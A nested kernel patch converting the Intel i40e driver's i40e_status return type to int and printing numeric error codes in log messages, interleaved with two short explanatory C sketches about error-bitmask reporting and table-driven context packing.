+@@ -2807,11 +2807,11 @@ static int i40e_set_phys_id(struct net_device *netdev,
+ 			    enum ethtool_phys_id_state state)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+-	i40e_status ret = 0;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	int blink_freq = 2;
+ 	u16 temp_status;
++	int ret = 0;
+ 
+ 	switch (state) {
+ 	case ETHTOOL_ID_ACTIVE:
+@@ -5247,7 +5247,7 @@ static int i40e_set_priv_flags(struct net_device *dev, u32 flags)
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	u32 reset_needed = 0;
+-	i40e_status status;
++	int status;
+ 	u32 i, j;
+ 
+ 	orig_flags = READ_ONCE(pf->flags);
+@@ -5362,8 +5362,8 @@ flags_complete:
+ 						0, NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't set switch config bits, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -5435,9 +5435,8 @@ flags_complete:
+ 					return -EBUSY;
+ 				default:
+ 					dev_warn(&pf->pdev->dev,
+-						 "Starting FW LLDP agent failed: error: %s, %s\n",
+-						 i40e_stat_str(&pf->hw,
+-							       status),
++						 "Starting FW LLDP agent failed: error: %d, %s\n",
++						 status,
+ 						 i40e_aq_str(&pf->hw,
+ 							     adq_err));
+ 					return -EINVAL;
+@@ -5477,8 +5476,8 @@ static int i40e_get_module_info(struct net_device *netdev,
+ 	u32 sff8472_comp = 0;
+ 	u32 sff8472_swap = 0;
+ 	u32 sff8636_rev = 0;
+-	i40e_status status;
+ 	u32 type = 0;
++	int status;
+ 
+ 	/* Check if firmware supports reading module EEPROM. */
+ 	if (!(hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE)) {
+@@ -5582,8 +5581,8 @@ static int i40e_get_module_eeprom(struct net_device *netdev,
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool is_sfp = false;
+-	i40e_status status;
+ 	u32 value = 0;
++	int status;
+ 	int i;
+ 
+ 	if (!ee || !ee->len || !data)
+@@ -5624,10 +5623,10 @@ static int i40e_get_eee(struct net_device *netdev, struct ethtool_eee *edata)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_aq_get_phy_abilities_resp phy_cfg;
+-	enum i40e_status_code status = 0;
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
++	int status = 0;
+ 
+ 	/* Get initial PHY capabilities */
+ 	status = i40e_aq_get_phy_capabilities(hw, false, true, &phy_cfg, NULL);
+@@ -5689,11 +5688,11 @@ static int i40e_set_eee(struct net_device *netdev, struct ethtool_eee *edata)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	enum i40e_status_code status = I40E_SUCCESS;
+ 	struct i40e_aq_set_phy_config config;
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
++	int status = I40E_SUCCESS;
+ 	__le16 eee_capability;
+ 
+ 	/* Deny parameters we don't support */
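
[The pauseparam path above shows why i40e_set_fc() reports through an aq_failures bitmask: the operation spans three firmware calls, each of which can fail independently, so each gets its own bit and its own log line while the caller still returns a single error. A sketch of that reporting shape — the bit values are assumptions of the sketch, not the driver's definitions:

#include <stdio.h>

#define SET_FC_FAIL_GET     0x1  /* get_phy_capabilities step */
#define SET_FC_FAIL_SET     0x2  /* set_phy_config step       */
#define SET_FC_FAIL_UPDATE  0x4  /* get_link_info step        */

static int report_fc_failures(int status, unsigned int aq_failures)
{
        int err = 0;

        if (aq_failures & SET_FC_FAIL_GET) {
                printf("set fc: get_phy_capabilities failed, err %d\n", status);
                err = -1;
        }
        if (aq_failures & SET_FC_FAIL_SET) {
                printf("set fc: set_phy_config failed, err %d\n", status);
                err = -1;
        }
        if (aq_failures & SET_FC_FAIL_UPDATE) {
                printf("set fc: get_link_info failed, err %d\n", status);
                err = -1;
        }
        return err;
}

int main(void)
{
        int err = report_fc_failures(-54, SET_FC_FAIL_GET | SET_FC_FAIL_UPDATE);

        printf("overall: %d\n", err);
        return 0;
}
]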
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_hmc.c b/drivers/net/ethernet/intel/i40e/i40e_hmc.c
+index 163ee8c6311cc..46f7950a0049a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_hmc.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_hmc.c
+@@ -17,17 +17,17 @@
+  * @type: what type of segment descriptor we're manipulating
+  * @direct_mode_sz: size to alloc in direct mode
+  **/
+-i40e_status i40e_add_sd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 sd_index,
+-					      enum i40e_sd_entry_type type,
+-					      u64 direct_mode_sz)
++int i40e_add_sd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 sd_index,
++			    enum i40e_sd_entry_type type,
++			    u64 direct_mode_sz)
+ {
+ 	enum i40e_memory_type mem_type __attribute__((unused));
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	bool dma_mem_alloc_done = false;
++	int ret_code = I40E_SUCCESS;
+ 	struct i40e_dma_mem mem;
+-	i40e_status ret_code = I40E_SUCCESS;
+ 	u64 alloc_len;
+ 
+ 	if (NULL == hmc_info->sd_table.sd_entry) {
+@@ -106,19 +106,19 @@ exit:
+  *	   aligned on 4K boundary and zeroed memory.
+  *	2. It should be 4K in size.
+  **/
+-i40e_status i40e_add_pd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 pd_index,
+-					      struct i40e_dma_mem *rsrc_pg)
++int i40e_add_pd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 pd_index,
++			    struct i40e_dma_mem *rsrc_pg)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	struct i40e_dma_mem mem;
+ 	struct i40e_dma_mem *page = &mem;
+ 	u32 sd_idx, rel_pd_idx;
+-	u64 *pd_addr;
++	int ret_code = 0;
+ 	u64 page_desc;
++	u64 *pd_addr;
+ 
+ 	if (pd_index / I40E_HMC_PD_CNT_IN_SD >= hmc_info->sd_table.sd_cnt) {
+ 		ret_code = I40E_ERR_INVALID_PAGE_DESC_INDEX;
+@@ -185,15 +185,15 @@ exit:
+  *	1. Caller can deallocate the memory used by backing storage after this
+  *	   function returns.
+  **/
+-i40e_status i40e_remove_pd_bp(struct i40e_hw *hw,
+-					struct i40e_hmc_info *hmc_info,
+-					u32 idx)
++int i40e_remove_pd_bp(struct i40e_hw *hw,
++		      struct i40e_hmc_info *hmc_info,
++		      u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	u32 sd_idx, rel_pd_idx;
++	int ret_code = 0;
+ 	u64 *pd_addr;
+ 
+ 	/* calculate index */
+@@ -241,11 +241,11 @@ exit:
+  * @hmc_info: pointer to the HMC configuration information structure
+  * @idx: the page index
+  **/
+-i40e_status i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
+-					     u32 idx)
++int i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
++			   u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
++	int ret_code = 0;
+ 
+ 	/* get the entry and decrease its ref counter */
+ 	sd_entry = &hmc_info->sd_table.sd_entry[idx];
+@@ -269,9 +269,9 @@ exit:
+  * @idx: the page index
+  * @is_pf: used to distinguish between VF and PF
+  **/
+-i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+-					    struct i40e_hmc_info *hmc_info,
+-					    u32 idx, bool is_pf)
++int i40e_remove_sd_bp_new(struct i40e_hw *hw,
++			  struct i40e_hmc_info *hmc_info,
++			  u32 idx, bool is_pf)
+ {
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 
+@@ -290,11 +290,11 @@ i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+  * @hmc_info: pointer to the HMC configuration information structure
+  * @idx: segment descriptor index to find the relevant page descriptor
+  **/
+-i40e_status i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
+-					       u32 idx)
++int i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
++			     u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
++	int ret_code = 0;
+ 
+ 	sd_entry = &hmc_info->sd_table.sd_entry[idx];
+ 
+@@ -318,9 +318,9 @@ exit:
+  * @idx: segment descriptor index to find the relevant page descriptor
+  * @is_pf: used to distinguish between VF and PF
+  **/
+-i40e_status i40e_remove_pd_page_new(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 idx, bool is_pf)
++int i40e_remove_pd_page_new(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 idx, bool is_pf)
+ {
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_hmc.h b/drivers/net/ethernet/intel/i40e/i40e_hmc.h
+index 3113792afaffa..9960da07a5732 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_hmc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_hmc.h
+@@ -187,28 +187,28 @@ struct i40e_hmc_info {
+ 	/* add one more to the limit to correct our range */		\
+ 	*(pd_limit) += 1;						\
+ }
+-i40e_status i40e_add_sd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 sd_index,
+-					      enum i40e_sd_entry_type type,
+-					      u64 direct_mode_sz);
+-
+-i40e_status i40e_add_pd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 pd_index,
+-					      struct i40e_dma_mem *rsrc_pg);
+-i40e_status i40e_remove_pd_bp(struct i40e_hw *hw,
+-					struct i40e_hmc_info *hmc_info,
+-					u32 idx);
+-i40e_status i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
+-					     u32 idx);
+-i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+-					    struct i40e_hmc_info *hmc_info,
+-					    u32 idx, bool is_pf);
+-i40e_status i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
+-					       u32 idx);
+-i40e_status i40e_remove_pd_page_new(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 idx, bool is_pf);
++
++int i40e_add_sd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 sd_index,
++			    enum i40e_sd_entry_type type,
++			    u64 direct_mode_sz);
++int i40e_add_pd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 pd_index,
++			    struct i40e_dma_mem *rsrc_pg);
++int i40e_remove_pd_bp(struct i40e_hw *hw,
++		      struct i40e_hmc_info *hmc_info,
++		      u32 idx);
++int i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
++			   u32 idx);
++int i40e_remove_sd_bp_new(struct i40e_hw *hw,
++			  struct i40e_hmc_info *hmc_info,
++			  u32 idx, bool is_pf);
++int i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
++			     u32 idx);
++int i40e_remove_pd_page_new(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 idx, bool is_pf);
+ 
+ #endif /* _I40E_HMC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
+index d6e92ecddfbd8..40c101f286d19 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
+@@ -74,12 +74,12 @@ static u64 i40e_calculate_l2fpm_size(u32 txq_num, u32 rxq_num,
+  * Assumptions:
+  *   - HMC Resource Profile has been selected before calling this function.
+  **/
+-i40e_status i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
+-					u32 rxq_num, u32 fcoe_cntx_num,
+-					u32 fcoe_filt_num)
++int i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
++		      u32 rxq_num, u32 fcoe_cntx_num,
++		      u32 fcoe_filt_num)
+ {
+ 	struct i40e_hmc_obj_info *obj, *full_obj;
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u64 l2fpm_size;
+ 	u32 size_exp;
+ 
+@@ -229,11 +229,11 @@ init_lan_hmc_out:
+  *	1. caller can deallocate the memory used by pd after this function
+  *	   returns.
+  **/
+-static i40e_status i40e_remove_pd_page(struct i40e_hw *hw,
+-						 struct i40e_hmc_info *hmc_info,
+-						 u32 idx)
++static int i40e_remove_pd_page(struct i40e_hw *hw,
++			       struct i40e_hmc_info *hmc_info,
++			       u32 idx)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (!i40e_prep_remove_pd_page(hmc_info, idx))
+ 		ret_code = i40e_remove_pd_page_new(hw, hmc_info, idx, true);
+@@ -256,11 +256,11 @@ static i40e_status i40e_remove_pd_page(struct i40e_hw *hw,
+  *	1. caller can deallocate the memory used by backing storage after this
+  *	   function returns.
+  **/
+-static i40e_status i40e_remove_sd_bp(struct i40e_hw *hw,
+-					       struct i40e_hmc_info *hmc_info,
+-					       u32 idx)
++static int i40e_remove_sd_bp(struct i40e_hw *hw,
++			     struct i40e_hmc_info *hmc_info,
++			     u32 idx)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (!i40e_prep_remove_sd_bp(hmc_info, idx))
+ 		ret_code = i40e_remove_sd_bp_new(hw, hmc_info, idx, true);
+@@ -276,15 +276,15 @@ static i40e_status i40e_remove_sd_bp(struct i40e_hw *hw,
+  * This will allocate memory for PDs and backing pages and populate
+  * the sd and pd entries.
+  **/
+-static i40e_status i40e_create_lan_hmc_object(struct i40e_hw *hw,
+-				struct i40e_hmc_lan_create_obj_info *info)
++static int i40e_create_lan_hmc_object(struct i40e_hw *hw,
++				      struct i40e_hmc_lan_create_obj_info *info)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	u32 pd_idx1 = 0, pd_lmt1 = 0;
+ 	u32 pd_idx = 0, pd_lmt = 0;
+ 	bool pd_error = false;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 	u64 sd_size;
+ 	u32 i, j;
+ 
+@@ -435,13 +435,13 @@ exit:
+  * - This function will be called after i40e_init_lan_hmc() and before
+  *   any LAN/FCoE HMC objects can be created.
+  **/
+-i40e_status i40e_configure_lan_hmc(struct i40e_hw *hw,
+-					     enum i40e_hmc_model model)
++int i40e_configure_lan_hmc(struct i40e_hw *hw,
++			   enum i40e_hmc_model model)
+ {
+ 	struct i40e_hmc_lan_create_obj_info info;
+-	i40e_status ret_code = 0;
+ 	u8 hmc_fn_id = hw->hmc.hmc_fn_id;
+ 	struct i40e_hmc_obj_info *obj;
++	int ret_code = 0;
+ 
+ 	/* Initialize part of the create object info struct */
+ 	info.hmc_info = &hw->hmc;
+@@ -520,13 +520,13 @@ configure_lan_hmc_out:
+  * caller should deallocate memory allocated previously for
+  * book-keeping information about PDs and backing storage.
+  **/
+-static i40e_status i40e_delete_lan_hmc_object(struct i40e_hw *hw,
+-				struct i40e_hmc_lan_delete_obj_info *info)
++static int i40e_delete_lan_hmc_object(struct i40e_hw *hw,
++				      struct i40e_hmc_lan_delete_obj_info *info)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	u32 pd_idx, pd_lmt, rel_pd_idx;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 	u32 i, j;
+ 
+ 	if (NULL == info) {
+@@ -632,10 +632,10 @@ exit:
+  * This must be called by drivers as they are shutting down and being
+  * removed from the OS.
+  **/
+-i40e_status i40e_shutdown_lan_hmc(struct i40e_hw *hw)
++int i40e_shutdown_lan_hmc(struct i40e_hw *hw)
+ {
+ 	struct i40e_hmc_lan_delete_obj_info info;
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	info.hmc_info = &hw->hmc;
+ 	info.rsrc_type = I40E_HMC_LAN_FULL;
+@@ -915,9 +915,9 @@ static void i40e_write_qword(u8 *hmc_bits,
+  * @context_bytes: pointer to the context bit array (DMA memory)
+  * @hmc_type: the type of HMC resource
+  **/
+-static i40e_status i40e_clear_hmc_context(struct i40e_hw *hw,
+-					u8 *context_bytes,
+-					enum i40e_hmc_lan_rsrc_type hmc_type)
++static int i40e_clear_hmc_context(struct i40e_hw *hw,
++				  u8 *context_bytes,
++				  enum i40e_hmc_lan_rsrc_type hmc_type)
+ {
+ 	/* clean the bit array */
+ 	memset(context_bytes, 0, (u32)hw->hmc.hmc_obj[hmc_type].size);
+@@ -931,9 +931,9 @@ static i40e_status i40e_clear_hmc_context(struct i40e_hw *hw,
+  * @ce_info:  a description of the struct to be filled
+  * @dest:     the struct to be filled
+  **/
+-static i40e_status i40e_set_hmc_context(u8 *context_bytes,
+-					struct i40e_context_ele *ce_info,
+-					u8 *dest)
++static int i40e_set_hmc_context(u8 *context_bytes,
++				struct i40e_context_ele *ce_info,
++				u8 *dest)
+ {
+ 	int f;
+ 
+@@ -973,18 +973,18 @@ static i40e_status i40e_set_hmc_context(u8 *context_bytes,
+  * base pointer.  This function is used for LAN Queue contexts.
+  **/
+ static
+-i40e_status i40e_hmc_get_object_va(struct i40e_hw *hw, u8 **object_base,
+-				   enum i40e_hmc_lan_rsrc_type rsrc_type,
+-				   u32 obj_idx)
++int i40e_hmc_get_object_va(struct i40e_hw *hw, u8 **object_base,
++			   enum i40e_hmc_lan_rsrc_type rsrc_type,
++			   u32 obj_idx)
+ {
+ 	struct i40e_hmc_info *hmc_info = &hw->hmc;
+ 	u32 obj_offset_in_sd, obj_offset_in_pd;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	u32 pd_idx, pd_lmt, rel_pd_idx;
+-	i40e_status ret_code = 0;
+ 	u64 obj_offset_in_fpm;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 
+ 	if (NULL == hmc_info) {
+ 		ret_code = I40E_ERR_BAD_PTR;
+@@ -1042,11 +1042,11 @@ exit:
+  * @hw:    the hardware struct
+  * @queue: the queue we care about
+  **/
+-i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+-						      u16 queue)
++int i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
++				    u16 queue)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_TX, queue);
+@@ -1062,12 +1062,12 @@ i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+  * @queue: the queue we care about
+  * @s:     the struct to be filled
+  **/
+-i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_txq *s)
++int i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_txq *s)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_TX, queue);
+@@ -1083,11 +1083,11 @@ i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+  * @hw:    the hardware struct
+  * @queue: the queue we care about
+  **/
+-i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+-						      u16 queue)
++int i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
++				    u16 queue)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_RX, queue);
+@@ -1103,12 +1103,12 @@ i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+  * @queue: the queue we care about
+  * @s:     the struct to be filled
+  **/
+-i40e_status i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_rxq *s)
++int i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_rxq *s)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_RX, queue);
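
[i40e_set_hmc_context() above is table-driven: a ce_info descriptor array records where each struct field lands in the flat hardware context image, and one generic writer loops over it. The real code packs at bit granularity through per-width helpers; the sketch below is byte-granular for brevity, and every name in it is invented:

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>

struct ctx_ele {
        size_t struct_off;  /* where the field lives in the C struct  */
        size_t ctx_off;     /* where it lands in the HW context image */
        size_t width;       /* bytes to copy                          */
};

struct obj_txq {            /* simplified queue-context source struct */
        uint16_t head;
        uint32_t base;
};

static const struct ctx_ele txq_ce_info[] = {
        { offsetof(struct obj_txq, head), 0, sizeof(uint16_t) },
        { offsetof(struct obj_txq, base), 4, sizeof(uint32_t) },
};

static void set_context(uint8_t *ctx, const struct ctx_ele *ce,
                        size_t n, const void *src)
{
        size_t f;

        for (f = 0; f < n; f++)
                memcpy(ctx + ce[f].ctx_off,
                       (const uint8_t *)src + ce[f].struct_off,
                       ce[f].width);
}

int main(void)
{
        struct obj_txq txq = { .head = 0x10, .base = 0xDEAD0000u };
        uint8_t ctx[8] = { 0 };
        size_t i;

        set_context(ctx, txq_ce_info,
                    sizeof(txq_ce_info) / sizeof(txq_ce_info[0]), &txq);
        for (i = 0; i < sizeof(ctx); i++)
                printf("%02x ", ctx[i]);
        printf("\n");
        return 0;
}

Adding a queue-context field then means adding one table entry rather than another hand-written copy.]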
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
+index c46a2c449e60e..9f960404c2b37 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
+@@ -137,22 +137,22 @@ struct i40e_hmc_lan_delete_obj_info {
+ 	u32 count;
+ };
+ 
+-i40e_status i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
+-					u32 rxq_num, u32 fcoe_cntx_num,
+-					u32 fcoe_filt_num);
+-i40e_status i40e_configure_lan_hmc(struct i40e_hw *hw,
+-					     enum i40e_hmc_model model);
+-i40e_status i40e_shutdown_lan_hmc(struct i40e_hw *hw);
+-
+-i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+-						      u16 queue);
+-i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_txq *s);
+-i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+-						      u16 queue);
+-i40e_status i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_rxq *s);
++int i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
++		      u32 rxq_num, u32 fcoe_cntx_num,
++		      u32 fcoe_filt_num);
++int i40e_configure_lan_hmc(struct i40e_hw *hw,
++			   enum i40e_hmc_model model);
++int i40e_shutdown_lan_hmc(struct i40e_hw *hw);
++
++int i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
++				    u16 queue);
++int i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_txq *s);
++int i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
++				    u16 queue);
++int i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_rxq *s);
+ 
+ #endif /* _I40E_LAN_HMC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 3ac7234a85bbb..49ba9f1be952d 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -1817,13 +1817,13 @@ static int i40e_set_mac(struct net_device *netdev, void *p)
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
+ 
+ 	if (vsi->type == I40E_VSI_MAIN) {
+-		i40e_status ret;
++		int ret;
+ 
+ 		ret = i40e_aq_mac_address_write(hw, I40E_AQC_WRITE_TYPE_LAA_WOL,
+ 						addr->sa_data, NULL);
+ 		if (ret)
+-			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %s, AQ ret %s\n",
+-				    i40e_stat_str(hw, ret),
++			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %d, AQ ret %s\n",
++				    ret,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1854,8 +1854,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_key(hw, vsi->id, seed_dw);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS key, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Cannot set RSS key, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -1866,8 +1866,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS lut, err %s aq_err %s\n",
+-				 i40e_stat_str(hw, ret),
++				 "Cannot set RSS lut, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -2349,7 +2349,7 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ {
+ 	struct i40e_hw *hw = &vsi->back->hw;
+ 	enum i40e_admin_queue_err aq_status;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	aq_ret = i40e_aq_remove_macvlan_v2(hw, vsi->seid, list, num_del, NULL,
+ 					   &aq_status);
+@@ -2358,8 +2358,8 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ 	if (aq_ret && !(aq_status == I40E_AQ_RC_ENOENT)) {
+ 		*retval = -EIO;
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "ignoring delete macvlan error on %s, err %s, aq_err %s\n",
+-			 vsi_name, i40e_stat_str(hw, aq_ret),
++			 "ignoring delete macvlan error on %s, err %d, aq_err %s\n",
++			 vsi_name, aq_ret,
+ 			 i40e_aq_str(hw, aq_status));
+ 	}
+ }
+@@ -2423,13 +2423,13 @@ void i40e_aqc_add_filters(struct i40e_vsi *vsi, const char *vsi_name,
+  *
+  * Returns status indicating success or failure;
+  **/
+-static i40e_status
++static int
+ i40e_aqc_broadcast_filter(struct i40e_vsi *vsi, const char *vsi_name,
+ 			  struct i40e_mac_filter *f)
+ {
+ 	bool enable = f->state == I40E_FILTER_NEW;
+ 	struct i40e_hw *hw = &vsi->back->hw;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	if (f->vlan == I40E_VLAN_ANY) {
+ 		aq_ret = i40e_aq_set_vsi_broadcast(hw,
+@@ -2468,7 +2468,7 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ {
+ 	struct i40e_vsi *vsi = pf->vsi[pf->lan_vsi];
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	if (vsi->type == I40E_VSI_MAIN &&
+ 	    pf->lan_veb != I40E_NO_VEB &&
+@@ -2488,8 +2488,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 							   NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Set default VSI failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "Set default VSI failed, err %d, aq_err %s\n",
++				 aq_ret,
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	} else {
+@@ -2500,8 +2500,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  true);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set unicast promisc failed, err %s, aq_err %s\n",
+-				 i40e_stat_str(hw, aq_ret),
++				 "set unicast promisc failed, err %d, aq_err %s\n",
